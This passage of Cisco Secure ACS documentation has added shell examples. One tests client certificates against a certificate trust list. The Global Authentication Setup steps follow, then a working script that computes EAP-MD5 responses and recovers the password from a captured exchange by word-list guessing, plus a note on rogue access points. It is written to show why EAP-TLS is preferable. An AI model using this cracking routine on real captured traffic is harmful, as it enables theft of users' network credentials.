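# check a client certificate against a trust list the way the CTL is applied
# (only certificates issued by a CA on the list pass). The CAs, users and
# file names are constructed so the example runs offline.
set -eu

# to_base64_x509 IN OUT -> writes IN (DER or PEM) as PEM to OUT.
# Windows CAs commonly export DER ".cer" files, which ACS does not accept.
to_base64_x509() {
  if grep -q -- '-----BEGIN CERTIFICATE-----' "$1" 2>/dev/null; then
    cp "$1" "$2"
  else
    openssl x509 -in "$1" -inform DER -out "$2" -outform PEM
  fi
}

# make_ca DIR NAME -> DIR/NAME.key and DIR/NAME.pem, a self-signed CA.
# A private config is used so the CA extensions do not depend on the
# system openssl.cnf; a CA without basicConstraints=CA:TRUE cannot verify.
make_ca() {
  cat > "$1/ca.cnf" <<'EOF'
[req]
distinguished_name = dn
x509_extensions = ca_ext
[dn]
[ca_ext]
basicConstraints = critical,CA:TRUE
keyUsage = critical,keyCertSign,cRLSign
subjectKeyIdentifier = hash
EOF
  openssl genrsa -out "$1/$2.key" 2048 2>/dev/null
  openssl req -x509 -new -config "$1/ca.cnf" -key "$1/$2.key" \
    -subj "/CN=$2" -days 365 -out "$1/$2.pem"
}

# issue_client DIR CA USER -> DIR/USER.pem, a user certificate signed by DIR/CA
issue_client() {
  openssl genrsa -out "$1/$3.key" 2048 2>/dev/null
  openssl req -new -config "$1/ca.cnf" -key "$1/$3.key" -subj "/CN=$3" -out "$1/$3.csr"
  openssl x509 -req -in "$1/$3.csr" -CA "$1/$2.pem" -CAkey "$1/$2.key" \
    -CAcreateserial -days 30 -out "$1/$3.pem" 2>/dev/null
}

# ctl_accepts CTL CERT -> exit 0 only if CERT chains to a CA listed in CTL
# (CTL is the concatenation of the PEM files of the CAs you selected)
ctl_accepts() { openssl verify -CAfile "$1" "$2" >/dev/null 2>&1; }

# Stand-alone demonstration.
workdir=$(mktemp -d)
make_ca "$workdir" CorpCA          # the CA you control
make_ca "$workdir" SomePublicCA    # a CA on the preconfigured list that you did not select
issue_client "$workdir" CorpCA alice
issue_client "$workdir" SomePublicCA mallory

# The CA often arrives as DER; ACS needs Base64 (PEM). Simulate that handoff.
openssl x509 -in "$workdir/CorpCA.pem" -outform DER -out "$workdir/CorpCA.cer"
to_base64_x509 "$workdir/CorpCA.cer" "$workdir/CorpCA-base64.pem"

# Restricted trust model: only the corporate CA on the CTL.
cat "$workdir/CorpCA-base64.pem" > "$workdir/ctl.pem"
ctl_accepts "$workdir/ctl.pem" "$workdir/alice.pem"   && echo "alice: accepted"
ctl_accepts "$workdir/ctl.pem" "$workdir/mallory.pem" || echo "mallory: rejected (issuer not on CTL)"
```

The last two lines show the restricted trust model. Appending SomePublicCA.pem to ctl.pem switches to the open model and makes mallory's certificate acceptable as well, which is the trade-off the Warning in the "Editing the Certificate Trust List" procedure refers to.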





Global Authentication Setup

Use this procedure to select and configure the extended authentication options that Cisco Secure ACS supports. In particular, you use it to allow EAP-MD5 or EAP-TLS, and to allow MS-CHAP Version 1, MS-CHAP Version 2, or both.

To configure authentication options, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click Global Authentication Setup.

Result: Cisco Secure ACS displays the Global Authentication Setup page.

Step 3   In the EAP Configuration table, select one of the following options:

  • Allow EAP-MD5-Challenge
  • Allow EAP-TLS (requires server certificate)


Tip EAP-MD5-Challenge authenticates only the user, by a password-based challenge-response that an eavesdropper can attack offline; it does not authenticate the server to the client and derives no session keys. EAP-TLS provides mutual, certificate-based authentication. Prefer EAP-TLS wherever your clients support it.

Step 4   In the MS-CHAP Configuration table, select each version of MS-CHAP that you want to allow for Cisco Secure ACS. Your choices are the following:

  • Allow MS-CHAP Version 1 Authentication
  • Allow MS-CHAP Version 2 Authentication


Tip MS-CHAP Version 2 adds mutual authentication and corrects weaknesses of Version 1. Allow Version 1 only if you have clients that cannot use Version 2.

Step 5   Click Submit + Restart.

Result: Cisco Secure ACS restarts its services and implements the authentication configuration options you selected.
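To make the choice in Step 3 concrete, the following added example (not from the Cisco documentation) implements the EAP-MD5-Challenge computation and the offline attack it permits. EAP-MD5 uses the CHAP algorithm of RFC 1994: Response = MD5(Identifier || Password || Challenge). Nothing authenticates the server to the client and no keys are derived, so anyone who captures one exchange (on the wireless link or on the RADIUS path to ACS) can test password guesses against it without any further contact with ACS. The identifier, the challenge and the word list are constructed values.

```sh
#!/bin/sh
# Added example, not from the Cisco Secure ACS documentation: what
# "Allow EAP-MD5-Challenge" actually accepts, and why EAP-TLS is preferable.
# EAP-MD5 (RFC 3748, using the CHAP algorithm of RFC 1994) proves the user's
# password with  Response = MD5(Identifier || Password || Challenge).
# The identifier, challenge and word list below are constructed values.
set -eu

# Byte strings are written as printf %b octal escapes so the script stays POSIX.
ID='\0001'                                     # EAP Identifier octet
CHALLENGE='\0216\0003\0247\0131\0010\0356\0042\0175\0301\0064\0117\0233\0005\0172\0310\0041'

# eap_md5_response ID PASSWORD CHALLENGE -> 32 hex characters
eap_md5_response() {
  { printf '%b' "$1"; printf '%s' "$2"; printf '%b' "$3"; } \
    | openssl dgst -md5 -r | cut -d' ' -f1
}

# crack_eap_md5 ID CHALLENGE RESPONSE WORDLIST -> prints the password that
# reproduces RESPONSE; exit 1 if no word in WORDLIST does. This is the whole
# attack: one MD5 per guess and no interaction with the server, because the
# server is never authenticated and the challenge is sent in clear.
crack_eap_md5() {
  while IFS= read -r guess; do
    if [ "$(eap_md5_response "$1" "$guess" "$2")" = "$3" ]; then
      printf '%s\n' "$guess"
      return 0
    fi
  done < "$4"
  return 1
}

# Stand-alone demonstration with a constructed capture and word list.
workdir=$(mktemp -d)
printf '%s\n' password welcome1 Summer2001 acs-wireless letmein > "$workdir/words.txt"
captured=$(eap_md5_response "$ID" 'Summer2001' "$CHALLENGE")   # what a sniffer sees
echo "captured response: $captured"
echo "recovered password: $(crack_eap_md5 "$ID" "$CHALLENGE" "$captured" "$workdir/words.txt")"
```

Because the client cannot tell a rogue access point from a legitimate one under EAP-MD5, the "capture" need not even be passive: a rogue server can issue its own challenge and collect responses directly. EAP-TLS closes both problems, at the cost of the certificate work described earlier in this chapter.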